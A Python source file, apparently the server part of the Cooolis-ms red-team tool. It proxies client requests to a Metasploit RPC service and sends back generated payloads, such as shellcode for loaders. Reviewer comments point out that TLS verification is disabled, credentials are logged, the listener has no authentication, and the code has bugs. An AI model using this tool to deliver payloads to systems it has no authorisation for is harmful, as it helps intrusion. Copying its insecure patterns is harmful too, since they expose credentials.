"""
Cooolis-ms
------------
Author:[email protected]
根据Metasploit Framework RPC 实现远程生成PAYLOAD,主要用于给灵活的PE加载器、Shellcode工作
Github:https://github.com/Rvn0xsy/Cooolis-ms/
"""
import requests
from argparse import ArgumentParser
import msgpack
import ssl
import sys
import json
import struct
from socketserver import BaseRequestHandler,ThreadingTCPServer
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Module-level side effects: both lines switch off TLS certificate
# verification process-wide, not just for the RPC calls below.
# Suppress the warning urllib3 would otherwise emit for verify=False requests.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# NOTE(review): replacing the default HTTPS context with an unverified one
# means any TLS connection made by this process (including the one carrying
# the Metasploit username/password in auth.login) will accept any certificate,
# so the credentials and returned payloads are exposed to an on-path attacker.
ssl._create_default_https_context = ssl._create_unverified_context
class Metasploit_RPC(BaseRequestHandler):
    """Per-connection TCP handler that proxies a payload request to the Metasploit RPC API.

    One instance is created for every accepted TCP client. Because
    BaseRequestHandler.__init__ calls setup()/handle()/finish() itself, the
    whole client session runs inside the constructor call made by the server.

    Security notes (reviewer):
    - The TCP listener performs no authentication of the connecting client;
      any peer that can reach the bound address can drive the operator's
      Metasploit credentials. Bind it to a trusted interface (see -S in main).
    - Credentials and the session token are printed to stdout (see _get_token).
    """

    def __init__(self, request, client_address, server, args):
        """Copy the parsed CLI options onto the instance, build the RPC URL, then hand off to the base class.

        Args:
            request: the accepted client socket (supplied by socketserver).
            client_address: (host, port) of the client (supplied by socketserver).
            server: the owning ThreadingTCPServer (supplied by socketserver).
            args: argparse.Namespace produced by main(); attributes read here
                are type, username, password, listen, host, port, server, uri,
                versobe and ssl.
        """
        self.type = args.type            # stored but not read anywhere in this class
        self.username = args.username
        self.password = args.password
        self.listen = args.listen
        self.host = args.host
        self.port = args.port
        # NOTE(review): BaseRequestHandler.__init__ (called below) assigns
        # self.server = server, so this value is overwritten before handle() runs.
        self.server = args.server
        self.uri = args.uri
        self.debug = args.versobe        # dest name matches the misspelled --versobe flag in main()
        self.token = ''
        self.url = ''
        self.headers = {"Content-type" : "binary/message-pack"}
        if args.ssl:
            prefix = 'https://'
        else:
            prefix = 'http://'
        self.url = "{prefix}{host}:{port}{uri}".format(prefix=prefix,host=self.host,port=self.port,uri=self.uri)
        # This call runs handle() immediately; nothing after it executes until the session ends.
        super().__init__(request, client_address, server)

    @classmethod
    def Creator(cls, *args, **kwargs):
        """Return a handler factory that binds extra constructor arguments.

        socketserver instantiates handlers as handler(request, client_address, server);
        the closure forwards *args/**kwargs (here: the argparse namespace) as well.
        The return value of the constructor is discarded, which is fine because
        all work happens inside __init__.
        """
        def _HandlerCreator(request, client_address, server):
            cls(request, client_address, server, *args, **kwargs)
        return _HandlerCreator

    def _request(self,options):
        """POST one msgpack-encoded RPC call to self.url and return the decoded reply.

        Args:
            options: list whose first element is the RPC method name, followed
                by its positional arguments.

        Returns:
            The unpacked reply dict (bytes keys) on success, or None when the
            reply carries an b'error' key or when any exception occurred.
        """
        try:
            print("[*]API URL : {url} , Method : {method}".format(url=self.url,method=options[0]))
            options = self.__pack(options)
            # verify=False: certificate checking is disabled for this request.
            req = requests.post(self.url,verify=False,headers=self.headers,data=options)
            result = self.__unpack(req.content)
            if b'error' in result:
                # NOTE(review): print() has no `encoding` keyword, so this line
                # raises TypeError and falls into the except below; the server's
                # error_message is never shown and None is returned either way.
                print("Error : %s" % str(result[b'error_message']),encoding = "utf8")
            else:
                return result
        except Exception as e:
            # Broad catch: network errors, msgpack errors and the TypeError above all land here.
            sys.stderr.write(str(e)+"\nRef:https://metasploit.help.rapid7.com/docs/standard-api-methods-referenc\n")

    def _get_token(self):
        """Authenticate with auth.login and store the session token in self.token.

        Raises:
            TypeError: if _request returned None (failed login), since
                None[b'token'] is evaluated without a check.
        """
        options = ["auth.login",self.username,self.password]
        result = self._request(options)
        self.token = str(result[b'token'],encoding = "utf8")
        # NOTE(review): this writes the RPC password and live token to stdout,
        # so any log capture of this process contains reusable credentials.
        print("[*]Token: {token} Username : {username} Password : {password}".format(token=self.token,username=self.username,password=self.password))

    # Pack data
    def __pack(self,pack_str):
        """Serialize a Python object with msgpack (name-mangled private helper)."""
        return msgpack.packb(pack_str)

    # Unpack data
    def __unpack(self,pack_str):
        """Deserialize msgpack bytes into a Python object (keys come back as bytes)."""
        return msgpack.unpackb(pack_str)

    def __send_payload(self,payload,options):
        """Call module.execute for the named payload module with the given option dict."""
        print("[*]PAYLOAD: {payload}, OPTIONS: {options}".format(payload=payload,options=options))
        pack_data = ["module.execute",self.token,"payload",payload,options]
        return self._request(pack_data)

    def handle(self):
        """Serve a single client request: log in, parse one fixed-size frame, reply with the generated bytes.

        Wire format expected from the client (from the struct format below):
        exactly 400 bytes, two NUL-padded 200-byte fields — payload module name,
        then a comma-separated "KEY=VALUE" option list. The reply is a 4-byte
        little-endian unsigned length followed by the payload bytes.

        The `finally: break` means the while loop body runs at most once per
        connection; a second frame on the same socket is never read.
        """
        print("[*]New connection: {client}".format(client=self.client_address))
        # Logs in once per client connection (no check that it succeeded).
        self._get_token()
        while True:
            data = self.request.recv(1024)
            if not data:break
            try:
                # struct.unpack requires len(data) == 400 exactly; a short or
                # coalesced TCP read raises struct.error and is swallowed below.
                data = struct.unpack(">200s200s",data)
                options = {}
                str_json = data[1].decode('UTF-8')
                str_json = str_json.strip('\x00')
                # print("Options : %s size : %d",str_json,len(str_json))
                for x in str_json.split(','):
                    # maxsplit=2 can yield three parts when a value contains '=',
                    # which makes the 2-tuple unpack raise ValueError.
                    k,v = x.split('=',2)
                    # print(k,":",v)
                    options.update({k.strip():v.strip()})
                payload = data[0].decode('UTF-8')
                payload = payload.strip('\x00')
                # print("Payload : %s Options : %s " % (payload,options['LHOST']))
                # Client-controlled module name and options are forwarded to the
                # RPC server unvalidated; only the RPC credentials gate this.
                recv_payload = self.__send_payload(payload,options)
                # print("Send .. %s ",recv_payload)
                # recv_payload is None on RPC failure, so this raises TypeError.
                payload_size = len(recv_payload[b'payload'])
                self.request.send(payload_size.to_bytes(4,byteorder='little',signed=False))
                self.request.send(recv_payload[b'payload'])
                self.request.close()
            except Exception as e:
                # Every failure in the frame is reported to stdout and the
                # connection is dropped without a reply.
                print("[!]{error}".format(error=str(e)))
                pass
            finally:
                break
def main():
    """Parse the CLI options and run the payload-proxy TCP server forever.

    The argparse namespace is passed whole to every handler via
    Metasploit_RPC.Creator; see that class for which attributes are read.
    """
    example = 'Example:\n\n$ python3 server.py -U msf -P msf -v -s -l 4444'
    args = ArgumentParser(prog='Cooolis-ms',epilog=example)
    args.add_argument('-U','--username',help='Metasploit web service username',required=True)
    args.add_argument('-P','--password',help='Metasploit web service password',required=True)
    args.add_argument('-H','--host',help='Metasploit web service host, Default: localhost',default='localhost')
    args.add_argument('-p','--port',help='Metasploit RPC service port, Default: 55553',default=55553,type=int)
    # -S / -l choose where the unauthenticated client listener binds; the
    # default of 'localhost' keeps it off external interfaces.
    args.add_argument('-S','--server',help='Payload sender listen host, Default: localhost',default='localhost')
    args.add_argument('-l','--listen',help='Payload listen port, Default: 1111',default=1111,type=int)
    args.add_argument('-u','--uri',help='Metasploit RPC service uri, Default: /api/1.0/',default='/api/1.0/')
    args.add_argument('-t','--type',help='Payload Type',choices=('exe','ruby','c','dll','vbs','powershell'))
    # NOTE(review): store_true with default=True means this flag can never
    # turn SSL off; args.ssl is always True regardless of -s.
    args.add_argument('-s','--ssl',help='Enable ssl, Default: True',action="store_true",default=True)
    # Destination attribute is literally 'versobe' (typo kept; handler reads args.versobe).
    args.add_argument('-v','--versobe',help='Enable debug',action="store_true")
    parser = args.parse_args()
    print("[*]Server Host : {host} , Server Port : {port}".format(host=parser.server,port=parser.listen))
    # One thread per accepted connection; each handler performs its own RPC login.
    server = ThreadingTCPServer((parser.server,parser.listen),Metasploit_RPC.Creator(parser))
    server.serve_forever()
# Script entry point; importing the module does not start the server.
if __name__ == "__main__":
    main()